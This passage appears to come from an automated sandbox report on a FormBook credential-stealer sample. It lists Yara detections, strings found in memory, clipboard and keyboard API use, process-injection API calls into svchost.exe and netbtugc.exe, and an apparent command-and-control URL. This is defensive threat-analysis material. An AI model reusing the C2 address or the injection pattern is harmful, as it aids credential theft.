            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000003.2047410010.0000000008132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_d
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000005.00000002.2600631900.00000000045A8000.00000004.10000000.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2600215728.00000000036B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqv
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB7099
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CB7294
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB7099
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00CA4342
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CCF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CCF5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4F3 NtClose,2_2_0042C4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E4340 NtSetContextThread,LdrInitializeThunk,5_2_038E4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E4650 NtSuspendThread,LdrInitializeThunk,5_2_038E4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_038E2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_038E2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_038E2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2B60 NtClose,LdrInitializeThunk,5_2_038E2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2AD0 NtReadFile,LdrInitializeThunk,5_2_038E2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2AF0 NtWriteFile,LdrInitializeThunk,5_2_038E2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2FB0 NtResumeThread,LdrInitializeThunk,5_2_038E2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2FE0 NtCreateFile,LdrInitializeThunk,5_2_038E2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2F30 NtCreateSection,LdrInitializeThunk,5_2_038E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_038E2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_038E2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2DD0 NtDelayExecution,LdrInitializeThunk,5_2_038E2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_038E2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_038E2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_038E2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_038E2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2C60 NtCreateKey,LdrInitializeThunk,5_2_038E2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_038E2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E35C0 NtCreateMutant,LdrInitializeThunk,5_2_038E35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E39B0 NtGetContextThread,LdrInitializeThunk,5_2_038E39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2B80 NtQueryInformationFile,5_2_038E2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2AB0 NtWaitForSingleObject,5_2_038E2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2F90 NtProtectVirtualMemory,5_2_038E2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2FA0 NtQuerySection,5_2_038E2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2F60 NtCreateProcessEx,5_2_038E2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2EA0 NtAdjustPrivilegesToken,5_2_038E2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2E30 NtWriteVirtualMemory,5_2_038E2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2DB0 NtEnumerateKey,5_2_038E2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2D00 NtSetInformationFile,5_2_038E2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2CC0 NtQueryVirtualMemory,5_2_038E2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2CF0 NtOpenProcess,5_2_038E2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E2C00 NtQueryInformationProcess,5_2_038E2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E3090 NtSetValueKey,5_2_038E3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E3010 NtOpenDirectoryObject,5_2_038E3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E3D10 NtOpenProcessToken,5_2_038E3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E3D70 NtOpenThread,5_2_038E3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03028B30 NtCreateFile,5_2_03028B30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03028FB0 NtAllocateVirtualMemory,5_2_03028FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03028E40 NtClose,5_2_03028E40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03028D90 NtDeleteFile,5_2_03028D90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03028CA0 NtReadFile,5_2_03028CA0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA70AE: CreateFileW,DeviceIoControl,CloseHandle,0_2_00CA70AE
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C9B9F1
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CA82D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C736800_2_00C73680
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C8BDF60_2_00C8BDF6
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C6A0C00_2_00C6A0C0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C801830_2_00C80183
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA220C0_2_00CA220C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C685300_2_00C68530
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C666700_2_00C66670
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C806770_2_00C80677
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C987790_2_00C98779
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CCA8DC0_2_00CCA8DC
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C80A8F0_2_00C80A8F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C66BBC0_2_00C66BBC
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C72B400_2_00C72B40
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C8AC830_2_00C8AC83
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C68CA00_2_00C68CA0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7AD5C0_2_00C7AD5C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C80EC40_2_00C80EC4
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C94EBF0_2_00C94EBF
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CC30AD0_2_00CC30AD
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9113E0_2_00C9113E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C812F90_2_00C812F9
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9542F0_2_00C9542F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CCF5D00_2_00CCF5D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9599F0_2_00C9599F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C8DA740_2_00C8DA74
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C6DCD00_2_00C6DCD0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C6BDF00_2_00C6BDF0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C65D320_2_00C65D32
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C81E5A0_2_00C81E5A
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C97FFD0_2_00C97FFD
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CABFB80_2_00CABFB8
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C8DF690_2_00C8DF69
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_033936000_2_03393600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185732_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100332_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030972_2_00403097
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030A02_2_004030A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0B32_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A302_2_00402A30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAD32_2_0042EAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034302_2_00403430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024D02_2_004024D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041674E2_2_0041674E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167532_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
